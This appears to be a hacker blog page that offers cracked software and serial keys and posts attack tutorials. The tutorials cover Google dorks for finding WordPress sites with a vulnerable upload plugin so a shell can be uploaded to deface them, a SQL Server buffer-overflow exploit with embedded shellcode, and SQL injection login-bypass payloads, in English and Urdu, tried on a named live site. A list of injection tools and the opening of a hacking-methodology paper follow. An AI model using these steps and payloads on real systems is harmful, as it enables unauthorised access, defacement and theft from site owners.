Welcome to HaCkEr-BrAdRi

HaCkEr-BrAdRi you Quality Software's Free of Cost with full version Keep Visiting and Keep enjoying . . . Don't Forget To Comment on Posts.

HaCkEr-BrAdRi Features

HaCkEr-BrAdRi provide you cracked,registered, serial key, and much more for free

HaCkEr-BrAdRi Update Daily

Our Team Update Blog Daily Or Twice A Day With latest and Cool Stuff For You For Free Download . . .

HaCkEr-BrAdRi Give You Big Variety Of Software's

HaCkEr-BrAdRi Provide You Latest and registered software's. . .

HaCkEr-BrAdRi

A Solution Of Your Needs

Showing posts with label Hacking Courses. Show all posts
Showing posts with label Hacking Courses. Show all posts

WordPress Exploit and WordPress Hacking How to


WordPress Exploit : 

You Can Hack Thousands of  WordPress Websites With This Exploit.

And Thousands of WordPress websites Are Vulnerable For This Attack 


Google Dorks For This WordPress Exploit.

Google Dork 1) “inurl:/wp-content/plugins/easy-comment-uploads/upload-form.php”
Google Dork 2) /wp-content/plugins/easy-comment-uploads/upload-form.php
Google Dork 3) Index of /wp-content/plugins/easy-comment-uploads


 Step 1

Open Google.com and Enter Any One Google Dork which Given,

Step 2

Now select any Website of WordPress.And Go To This
 URL
 VictimSite.com/wp-content/plugins/easy-comment-uploads/upload-form.php

You'll Get Upload Option Here Posted Image
Now Upload Your Shell To Deface The Website ….

Step 3

And Now Check It Here
 VictimSite.com/wp-content/uploads/2012/10/yourfilehere

How Exploit Writing in SQL SERVER EXPLOIT SQL


declare @exploit nvarchar(4000) 
declare @padding nvarchar(2000) 
declare @saved_return_address nvarchar(20) 
declare @code nvarchar(1000) 
declare @pad nvarchar(16) 
declare @cnt int 
declare @more_pad nvarchar(100) 
select @cnt = 0 
select @padding = 0x41414141 
select @pad = 0x4141 
while @cnt < 1063 
begin 

                                select @padding = @padding + @pad 

                                select @cnt = @cnt + 1 

end 
-- overwrite the saved return address 

select @saved_return_address = 0xDCC9B042 
select @more_pad = 0x4343434344444444454545454646464647474747 

-- code to call CreateFile(). The address is hardcoded to 0x77E86F87 - Win2K Sp2 
 -- change if running a different service pack 

select @code = 0x558BEC33C05068542D424F6844534A4568514C2D4F68433A5C538D142450504050485050B0C05052B8876FE877FFD0CCCCCCCCCC 
select @exploit = N'SELECT * FROM OpenDataSource( ''Microsoft.Jet.OLEDB.4.0'',''Data Source="c:\' 
select @exploit = @exploit + @padding + @saved_return_address + @more_pad + @code 
select @exploit = @exploit + N'";User ID=Admin;Password=;Extended properties=Excel 5.0'')...xactions' 
exec (@exploit)

Top SQL Injection Tools

Top SQL Injection Tools

SQL Injection is widely known and used method to penetrate into websites. since the rise of the CMS like wordpress & joomla etc, mass hacking attacks are becoming more frequent as one single vulnerability in the scripting puts millions of blogs/websites on risk. The aim of the attacks are to gather data of interest, defacing the websites and sometimes trolling (kid hackers!).
Here is the list of top SQL Injection tools that might come in handy when you are checking your own website for vulnerabilities.

Havij SQL Injection Tool:

By far THE best SQL Injection tool that I have come across. It is fast, robust & design to analyze the database deeply in order to find the vulnerability. Also, it is very newbie friendly since it has a GUI and works on windows.

SQL Ninja:

My second favorite when it comes to SQL injection. I personally like this tool because it also works with MS SQL. This tool is good because it focuses more on getting interactive shell on the remote database server instead of extracting the data.

Safe3SI:

Another tool with a GUI (works with windows) which is powerful and user-friendly pen test tool. This tool automates al the processes. Right from the fingerprinting, till extraction of info from the database. This would be the second choice for windows users after Havij.

BlindSQL Hacker:

Blind SQL Hacker aka BSQL Hacker automates vulnerability identification and exploitation for all the environments e.g. mySQL & MSSQL.

SQLMAP:

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

I believe manual SQL Injection can out run any of these tools, however, it is pain in the ass and consumes a lot of time. Working with any of these tools along with manual penetration can produce some great results. I have used all of the mentioned tools and seemed to work pretty fine.

SQL Injecting by HaCkEr-BrAdRi ( English )

SQL Injecting by HaCkEr-BrAdRi

Step 1: Open  Google.com .

Step 2: Then Paste One String in Google Search Bar.

inurl:adminlogin.asp
inurl:admin_login.asp
inurl:adminlogon.asp
inurl:admin_logon.asp
inurl:\\admin/admin_login.php
inurl:/admin.asp
inurl:/login.asp
inurl:/logon.asp
inurl:/adminlogin.asp
inurl:/adminlogon.asp
inurl:/admin_login.asp
inurl:/admin_logon.asp
inurl:/admin/admin.asp
inurl:/admin/login.asp
inurl:/admin/logon.asp
inurl:/admin/adminlogin.asp
inurl:/admin/adminlogon.asp
inurl:/admin/admin_login.asp
inurl:/admin/admin_logon.asp
inurl:/administrator/admin.asp
inurl:/administrator/login.asp
inurl:/administrator/logon.asp
inurl:root/login.asp
inurl:admin/index.asp

Step 3 :  Click On Search Button.

Step 4 : Then you will see the highlighted green colour which is matching with your string , you have searched. as shown in figure.

Then click on that link which is Matching with you string. then you will see the page which contain


USER NAME
OR
PASSWORD



Then Type in USERNAME

admin or any  Injetion,

Then in  PASSWORD type any one string,

admin'--

1'or'1'='1

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

1' OR '1'='1       

Step 5 : Then Hit Enter.

 Now you Are In ADMIN PANEL of website

Now Start Changing In ADMIN PANEL :)


Test Your Skill Here
If You Want To Test THEN open  www.orodue.com/admin_login.asp
  Admin Id(Username) Type 1' OR '1'='1
Or
In Pasword Field Type 1' OR '1'='1 and
get enjoy in Admin Panel Of The Website

THANKS TO
HaCkEr-BrAdRi

EDU Purpose ONLY

SQL Injecting by HaCkEr-BrAdRi ( Urdu Tutorial )

Sql Injecting by HaCkEr-BrAdRi

Sub Pehly Ap Google.com Open Karyn

Phr Ap Google Search Bar Mein Type Karyn

inurl:adminlogin.asp
inurl:admin_login.asp
inurl:adminlogon.asp
inurl:admin_logon.asp
inurl:\\admin/admin_login.php
inurl:/admin.asp
inurl:/login.asp
inurl:/logon.asp
inurl:/adminlogin.asp
inurl:/adminlogon.asp
inurl:/admin_login.asp
inurl:/admin_logon.asp
inurl:/admin/admin.asp
inurl:/admin/login.asp
inurl:/admin/logon.asp
inurl:/admin/adminlogin.asp
inurl:/admin/adminlogon.asp
inurl:/admin/admin_login.asp
inurl:/admin/admin_logon.asp
inurl:/administrator/admin.asp
inurl:/administrator/login.asp
inurl:/administrator/logon.asp
inurl:root/login.asp
inurl:admin/index.asp

Phr In Mein Sy Ek Google Search Bar Mein Dalyn .

Phr Click On Search Button.

Phr Jo Web Search Result Aye To Ap Web Site URL(Address) Jo Green Clour Mein Ho Ga Us K

End Mein Vo Lafz Ho Gy Jo Ap Ny Search Keyn Hain Vo Hon Gy Us Link Py Clik

Kryn Phr Ap K Samny

USER NAME
OR
PASWORD


Wala Page A Gya Ha.

Phr App USERNAME Mein Type Kryn

admin Ya Koi Sa Bhi Injetion Jo App Pasword Mein Use Ker Rehy Hain

or PASSWORD Mein Type Keryn Yeh

admin'--

1'or'1'='1

' or 0=0 --

" or 0=0 --

or 0=0 --

' or 0=0 #

" or 0=0 #

or 0=0 #

' or 'x'='x

" or "x"="x

') or ('x'='x

' or 1=1--

" or 1=1--

or 1=1--

' or a=a--

" or "a"="a

') or ('a'='a

") or ("a"="a

hi" or "a"="a

hi" or 1=1 --

hi' or 1=1 --

hi' or 'a'='a

hi') or ('a'='a

hi") or ("a"="a

1' OR '1'='1         (Koi Ek Dalna Ha Password Mein)

Phr Click Kryn Enter.

Ab Website Hack Ho Gai Ha.

Ab Ap ADMIN PANEL Mein Inter Ho Gye Hain.

And Ab Start Changing In ADMIN PANEL Jo Ap Chahyn Okz


Apna Tajurba Yehan Azmyen
App Test Kerna Chaty Hain To Yehan Keryn
Yeh Link OPen Keryn 
www.orodue.com/admin_login.asp
 IS K Admin Id(Username) Mein Type Keryn Yeh 1' OR '1'='1
Or
Pasword mein B Yehi Type Keryn 1' OR '1'='1 aur
web site k admin panel mein mazy karyn.


THIS SMALL WEB HACKING TUTORIAL BY
http://hackerbradri.net.tc
THANKS TO
HaCkEr-BrAdRi

Hacking: An Analysis of Current Methodology

1 Abstract

Hacking has become a significant threat to networks exposed to the Internet. In order to
prevent systems from being hacked, the methods used by hackers must be well
understood. Hackers begin by selecting and footprinting a target network. Once the
target network is mapped, hackers proceed to map vulnerabilities and gain access by
cracking passwords, using stack-smashing attacks, or spoofing the IP address of trusted
machines. Hackers can then sniff internal network traffic or find other hosts that contain
vital company secrets. Finally, a hacker can clean up system logs in order to conceal the
fact that an attack occurred. In this paper we explain how each of these attack techniques
is carried out.

2  Introduction

The Internet has become a widely used medium for companies, schools, and governments
to share data. Because of the need to exchange electronic information, most computer
networks are connected and exposed to traffic on the Internet. With this exposure comes
security concerns. Hackers are a significant threat because often all that lies between a
hacker and a company’s internal secrets may be a poorly administered firewall or border
router.
How significant is this threat? A sampling of traffic into and out of a network over a few
days will often show hundreds, perhaps thousands of potentially malicious data packets.
Hundreds of hacking web sites have been born over the past years providing information
ranging from how to spoof email to how to gain root access on web servers. Hackers
need not understand the technology behind their methods; they can simply download a
script and go to work. In essence, the threat of a network being attacked is significant
and should not be taken lightly because even the novice hacker is capable of launching a
potentially damaging attack.
How can hackers be stopped? To answer this question, it is important to understand how
a hacker attacks a system. From footprinting to log cleanup, a hacker’s methodology
must be well understood so that firewalls and Intrusion Detection Systems (IDS) can be
built to prevent or detect future attacks.